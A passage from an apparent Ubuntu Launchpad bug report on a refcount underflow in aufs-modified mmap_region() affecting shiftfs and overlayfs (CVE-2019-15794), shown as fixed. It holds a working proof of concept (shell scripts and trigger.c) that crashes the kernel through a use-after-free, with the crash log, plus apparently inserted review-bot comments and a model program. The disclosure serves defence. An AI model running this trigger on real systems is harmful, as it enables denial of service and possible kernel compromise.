    mic issues (LP: #1850599)
    - SAUCE: ALSA: hda/realtek - Add support for ALC623
    - SAUCE: ALSA: hda/realtek - Fix 2 front mics of codec 0x623

  * Suppress "hid_field_extract() called with n (192) > 32!" message floods
    (LP: #1850600)
    - HID: core: reformat and reduce hid_printk macros
    - HID: core: Add printk_once variants to hid_warn() etc
    - HID: core: fix dmesg flooding if report field larger than 32bit

  * ubuntu-aufs-modified mmap_region() breaks refcounting in overlayfs/shiftfs
    error path (LP: #1850994) // CVE-2019-15794
    - SAUCE: shiftfs: Restore vm_file value when lower fs mmap fails
    - SAUCE: ovl: Restore vm_file value when lower fs mmap fails

  * s_iflags overlap prevents unprivileged overlayfs mounts (LP: #1851677)
    - SAUCE: fs: Move SB_I_NOSUID to the top of s_iflags

  * root can lift kernel lockdown (LP: #1851380)
    - SAUCE: (efi-lockdown) Really don't allow lifting lockdown from userspace

  * Colour banding in Lenovo G50-80 laptop display (i915) (LP: #1819968) // Eoan
    update: v5.3.8 upstream stable release (LP: #1850456)
    - drm/edid: Add 6 bpc quirk for SDC panel in Lenovo G50

 -- Connor Kuehl <connor.ku...@canonical.com>  Wed, 13 Nov 2019 14:41:52 -0800

** Changed in: linux (Ubuntu Focal)
       Status: In Progress => Fix Released

https://bugs.launchpad.net/bugs/1850994

Title:
  ubuntu-aufs-modified mmap_region() breaks refcounting in
  overlayfs/shiftfs error path

Status in linux package in Ubuntu:
  Fix Released
Status in linux source package in Disco:
  Fix Released
Status in linux source package in Eoan:
  Fix Released
Status in linux source package in Focal:
  Fix Released

Bug description:
  SRU Justification

  Impact: overlayfs and shiftfs both replace vma->vm_file in their mmap
  handlers. On error the original value is not restored, and the
  reference is put for the file to which vm_file points. On upstream
  kernels this is not an issue, as no callers dereference vm_file
  after call_mmap() returns an error.
  However, the aufs patches change mmap_region() to replace the fput()
  using a local variable with vma_fput(), which will fput() vm_file,
  leading to a refcount underflow.

  Fix: Restore the original vm_file value on error.

  Test Case: See below.

  Regression Potential: Minimal. As stated above, other callers of
  call_mmap() do not dereference vma->vm_file when it returns an error,
  and the one which does is fixed by these patches.

  Notes: Supported kernels prior to disco are not affected as overlayfs
  did not support mmap until 4.19, and shiftfs was not present in Ubuntu
  kernels before disco. The issue is mitigated for overlayfs by another
  bug which is preventing unprivileged mounting; a patch for this issue
  will be sent separately.

  ---

  Tested on 19.10.

  Ubuntu's aufs kernel patch includes the following change (which I
  interestingly can't see in the AUFS code at
  https://github.com/sfjro/aufs5-linux/blob/master/mm/mmap.c):

  ==================================================================
  +#define vma_fput(vma)                  vma_do_fput(vma, __func__, __LINE__)
  [...]
  @@ -1847,8 +1847,8 @@ unsigned long mmap_region(struct file *file, unsigned 
long addr,
          return addr;

   unmap_and_free_vma:
  +       vma_fput(vma);
          vma->vm_file = NULL;
  -       fput(file);

          /* Undo any partial mapping done by a device driver. */
          unmap_region(mm, vma, prev, vma->vm_start, vma->vm_end);
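  Review bot: at the `unmap_and_free_vma:` label the replacement `vma_fput(vma);` puts `vma->vm_file`, whereas the removed `fput(file);` put the `file` argument that mmap_region() itself took the reference on. The two are only equivalent if the ->mmap handler left `vma->vm_file` untouched; a handler that swaps in another file and then fails (as the shiftfs and overlayfs handlers discussed in this report do) leaks the reference on `file` and drops one on the substituted file instead. Either keep `fput(file);` here or check `vma->vm_file == file` before calling vma_fput() in this error path.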
  [...]
  +void vma_do_fput(struct vm_area_struct *vma, const char func[], int line)
  +{
  +       struct file *f = vma->vm_file, *pr = vma->vm_prfile;
  +
  +       prfile_trace(f, pr, func, line, __func__);
  +       fput(f);
  +       if (f && pr)
  +               fput(pr);
  +}
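  Review bot: in vma_do_fput() `fput(f);` runs unconditionally while the next line tests `f && pr`, so the NULL check covers only the prfile put; if `vma->vm_file` can be NULL on any path that reaches this helper, `fput(f)` needs the same `if (f)` guard, and if it cannot, the `f &&` in the following condition is dead and should go.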
  ==================================================================

  This means that in the case where call_mmap() returns an error to
  mmap_region(), fput() will be called on the current value of vma->vm_file
  instead of the saved file pointer. This matters if the ->mmap() handler
  replaces ->vm_file before returning an error code.

  overlayfs and shiftfs do that when call_mmap() on the lower filesystem fails,
  see ovl_mmap() and shiftfs_mmap().
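  The refcount arithmetic described above, modelled in user space as an added example that is not code from this report, the kernel, aufs or shiftfs: `struct file`, `struct vma`, `get_file()`, `fput()`, `stacking_mmap()` and `mmap_region()` are stand-ins that keep only what the bug needs, and the assumption that the upper file pins its lower file through a private pointer follows the description of shiftfs. Running it shows the aufs-style error path combined with the unfixed handler freeing the lower file while the upper file still points at it (the state the second mmap() in the PoC then dereferences), and the restored vm_file making either error path balance.

```c
#include <errno.h>
#include <stdio.h>

/* Stand-ins written for this page (not kernel, aufs or shiftfs code), keeping
 * only the fields the bug needs. 'lower' models the real file a stacking fs
 * keeps in file->private_data and holds one reference on (an assumption). */
struct vma;
struct file {
    int refcount;                  /* models f_count */
    int freed;                     /* set when refcount reaches 0 (__fput) */
    int fixed;                     /* handler restores vm_file on error */
    struct file *lower;            /* stacking fs: the real (lower) file */
    int (*mmap)(struct file *, struct vma *);
};
struct vma { struct file *vm_file; };

static struct file *get_file(struct file *f) { f->refcount++; return f; }
static void fput(struct file *f)
{
    if (--f->refcount == 0)
        f->freed = 1;              /* one more fput() here is the underflow */
}

/* Lower fs refusing the mapping, as FUSE direct_io does for MAP_SHARED. */
static int lower_mmap_enodev(struct file *f, struct vma *vma)
{ (void)f; (void)vma; return -ENODEV; }

/* Stacking-fs ->mmap. Before the fix the error path left vm_file pointing at
 * the lower file (whose extra ref it had just dropped); the fix restores it. */
static int stacking_mmap(struct file *file, struct vma *vma)
{
    struct file *realfile = file->lower;
    int ret;

    vma->vm_file = get_file(realfile);
    ret = realfile->mmap(realfile, vma);   /* call_mmap() on the lower fs */
    if (ret) {
        fput(realfile);                    /* drop the ref taken above */
        if (file->fixed)
            vma->vm_file = file;           /* the fix: restore vm_file */
    } else {
        fput(file);                        /* drop mmap_region()'s ref on file */
    }
    return ret;
}

/* mmap_region() error path: upstream puts the saved 'file' argument, the
 * aufs-modified version puts whatever vma->vm_file holds at that point. */
static int mmap_region(struct file *file, struct vma *vma, int aufs_style)
{
    int ret;

    vma->vm_file = get_file(file);
    ret = file->mmap(file, vma);           /* call_mmap() */
    if (ret) {
        if (aufs_style)
            fput(vma->vm_file);            /* vma_fput(vma) */
        else
            fput(file);                    /* fput(file) */
        vma->vm_file = NULL;
    }
    return ret;
}

struct outcome {
    int upper_refcount;   /* 1 expected: only the open() reference remains */
    int lower_refcount;   /* 1 expected: the upper file's reference remains */
    int lower_freed;      /* 1: the next mmap() on upper touches freed memory */
};

/* One open()ed upper file pinning its lower file, one failing MAP_SHARED mmap(). */
static struct outcome run_scenario(int aufs_style, int fixed_handler)
{
    struct file lower = { .refcount = 1, .mmap = lower_mmap_enodev };
    struct file upper = { .refcount = 1, .fixed = fixed_handler,
                          .lower = &lower, .mmap = stacking_mmap };
    struct vma vma = { NULL };
    struct outcome o;

    (void)mmap_region(&upper, &vma, aufs_style);   /* -ENODEV in every case */
    o.upper_refcount = upper.refcount;
    o.lower_refcount = lower.refcount;
    o.lower_freed = lower.freed;
    return o;
}

int main(void)
{
    for (int aufs = 0; aufs <= 1; aufs++)
        for (int fixed = 0; fixed <= 1; fixed++) {
            struct outcome o = run_scenario(aufs, fixed);
            printf("%-8s mmap_region, %-5s handler: upper=%d lower=%d%s\n",
                   aufs ? "aufs" : "upstream", fixed ? "fixed" : "buggy",
                   o.upper_refcount, o.lower_refcount,
                   o.lower_freed ? "  <- lower freed, upper still points at it" : "");
        }
    return 0;
}
```

  Only the aufs/buggy combination ends with the lower file at refcount 0 and the upper file holding a leaked reference; the upstream error path never looks at vma->vm_file, and the fixed handler makes vma->vm_file equal to the saved file again, so both error paths put the same reference.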

  To demonstrate the issue, the PoC below mounts a shiftfs that is backed by a
  FUSE filesystem with the FUSE flag FOPEN_DIRECT_IO, which causes
  fuse_file_mmap() to bail out with -ENODEV if MAP_SHARED is set.

  I would have used overlayfs instead, but there is an unrelated bug that makes
  it impossible to mount overlayfs inside a user namespace:
  Commit 82c0860106f264 ("UBUNTU: SAUCE: overlayfs: Propogate nosuid from lower
  and upper mounts") defines SB_I_NOSUID as 0x00000010, but SB_I_USERNS_VISIBLE
  already has the same value. This causes mount_too_revealing() to bail out
  with a WARN_ONCE().

  Note that this PoC requires the "bindfs" package and should be executed with
  "slub_debug" in the kernel commandline to get a clear crash.

  ==================================================================
  Ubuntu 19.10 user-Standard-PC-Q35-ICH9-2009 ttyS0

  user-Standard-PC-Q35-ICH9-2009 login: user
  Password:
  Last login: Fr Nov  1 23:45:36 CET 2019 on ttyS0
  Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-19-generic x86_64)

   * Documentation:  https://help.ubuntu.com
   * Management:     https://landscape.canonical.com
   * Support:        https://ubuntu.com/advantage

  0 updates can be installed immediately.
  0 of these updates are security updates.

  user@user-Standard-PC-Q35-ICH9-2009:~$ ls
  aufs-mmap  Documents  Music     Public     trace.dat
  Desktop    Downloads  Pictures  Templates  Videos
  user@user-Standard-PC-Q35-ICH9-2009:~$ cd aufs-mmap/
  user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat /proc/cmdline
  BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=f7d8d4fb-0c96-498e-b875-0b777127a332 ro console=ttyS0 slub_debug quiet splash vt.handoff=7
  user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run.sh
  #!/bin/sh
  sync
  unshare -mUr ./run2.sh
  user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run2.sh
  #!/bin/bash
  set -e

  mount -t tmpfs none /tmp
  mkdir -p /tmp/{lower,middle,upper}
  touch /tmp/lower/foo
  # mount some random FUSE filesystem with direct_io,
  # doesn't really matter what it does as long as
  # there's a file in it.
  # (this is just to get some filesystem that can
  # easily be convinced to throw errors from f_op->mmap)
  bindfs -o direct_io /tmp/lower /tmp/middle
  # use the FUSE filesystem to back shiftfs.
  # overlayfs would also work if SB_I_NOSUID and
  # SB_I_USERNS_VISIBLE weren't defined to the same
  # value...
  mount -t shiftfs -o mark /tmp/middle /tmp/upper
  mount|grep shift
  gcc -o trigger trigger.c -Wall
  ./trigger
  user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat trigger.c
  #include <fcntl.h>
  #include <err.h>
  #include <unistd.h>
  #include <sys/mman.h>
  #include <stdio.h>

  int main(void) {
    int foofd = open("/tmp/upper/foo", O_RDONLY);
    if (foofd == -1) err(1, "open foofd");
    /* First mmap: the FUSE direct_io backend rejects MAP_SHARED with -ENODEV,
       so shiftfs_mmap() fails after having swapped vma->vm_file for the lower
       file, and the aufs-modified mmap_region() error path then fput()s that
       lower file instead of the shiftfs file. */
    void *badmap = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
    if (badmap == MAP_FAILED) {
      perror("badmap");
    } else {
      errx(1, "badmap worked???");
    }
    sleep(1);
    /* Second mmap: shiftfs_mmap() reaches the lower file through the shiftfs
       file again, which now points at freed memory. */
    mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
    return 0;
  }
  user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ ./run.sh
  /tmp/middle on /tmp/upper type shiftfs (rw,relatime,mark)
  badmap: No such device
  [   72.101721] general protection fault: 0000 [#1] SMP PTI
  [   72.111917] CPU: 1 PID: 1376 Comm: trigger Not tainted 5.3.0-19-generic 
#20-Ubuntu
  [   72.124846] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 
1.12.0-1 04/01/2014
  [   72.140965] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
  [   72.149210] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 
41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 
60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
  [   72.167229] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
  [   72.170426] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 
7800000000000000
  [   72.174528] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: 
ffff9c1cc48b5900
  [   72.177790] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 
0000000000000000
  [   72.181199] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: 
ffff9c1cf1ae5790
  [   72.186306] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: 
ffff9c1cf7209740
  [   72.189705] FS:  00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) 
knlGS:0000000000000000
  [   72.193073] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
  [   72.195390] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 
0000000000360ee0
  [   72.198237] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 
0000000000000000
  [   72.200557] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 
0000000000000400
  [   72.202815] Call Trace:
  [   72.203712]  mmap_region+0x417/0x670
  [   72.204868]  do_mmap+0x3a8/0x580
  [   72.205939]  vm_mmap_pgoff+0xcb/0x120
  [   72.207954]  ksys_mmap_pgoff+0x1ca/0x2a0
  [   72.210078]  __x64_sys_mmap+0x33/0x40
  [   72.211327]  do_syscall_64+0x5a/0x130
  [   72.212538]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
  [   72.214177] RIP: 0033:0x7faa3ecc7af6
  [   72.215352] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 
89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 
f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
  [   72.222275] RSP: 002b:00007ffd0fc44c68 EFLAGS: 00000246 ORIG_RAX: 
0000000000000009
  [   72.224714] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 
00007faa3ecc7af6
  [   72.228123] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 
0000000000000000
  [   72.230913] RBP: 0000000000000000 R08: 0000000000000003 R09: 
0000000000000000
  [   72.233193] R10: 0000000000000001 R11: 0000000000000246 R12: 
0000556248213100
  [   72.235448] R13: 00007ffd0fc44d70 R14: 0000000000000000 R15: 
0000000000000000
  [   72.237681] Modules linked in: shiftfs intel_rapl_msr 
snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core 
snd_hwdep snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi intel_rapl_common 
crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 
crypto_simd snd_seq cryptd glue_helper joydev input_leds serio_raw 
snd_seq_device snd_timer snd qxl ttm soundcore qemu_fw_cfg drm_kms_helper drm 
fb_sys_fops syscopyarea sysfillrect sysimgblt mac_hid sch_fq_codel parport_pc 
ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid 
virtio_net net_failover failover ahci psmouse lpc_ich i2c_i801 libahci 
virtio_blk
  [   72.257673] ---[ end trace 5d85e7b7b0bae5f5 ]---
  [   72.259237] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
  [   72.260990] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 
41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 
60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
  [   72.269615] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
  [   72.271414] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 
7800000000000000
  [   72.273893] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: 
ffff9c1cc48b5900
  [   72.276354] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 
0000000000000000
  [   72.278796] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: 
ffff9c1cf1ae5790
  [   72.281095] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: 
ffff9c1cf7209740
  [   72.284048] FS:  00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) 
knlGS:0000000000000000
  [   72.287161] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
  [   72.289164] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 
0000000000360ee0
  [   72.291953] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 
0000000000000000
  [   72.294487] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 
0000000000000400
  ==================================================================

  Faulting code:

  0000000F  55                push rbp
  00000010  4889E5            mov rbp,rsp
  00000013  4157              push r15
  00000015  4156              push r14
  00000017  4155              push r13
  00000019  4154              push r12
  0000001B  488B87C8000000    mov rax,[rdi+0xc8]
  00000022  4C8B6810          mov r13,[rax+0x10]
  00000026  498B4528          mov rax,[r13+0x28]
  0000002A  4883786000        cmp qword [rax+0x60],byte +0x0     <<<< GPF HERE
  0000002F  0F8497000000      jz near 0xcc
  00000035  4989FC            mov r12,rdi
  00000038  4989F6            mov r14,rsi

  As you can see, the poison value 6b6b6b6b6b6b6b6b is being
  dereferenced.

  This bug is subject to a 90 day disclosure deadline. After 90 days elapse
  or a patch has been made broadly available (whichever is earlier), the bug
  report will become visible to the public.
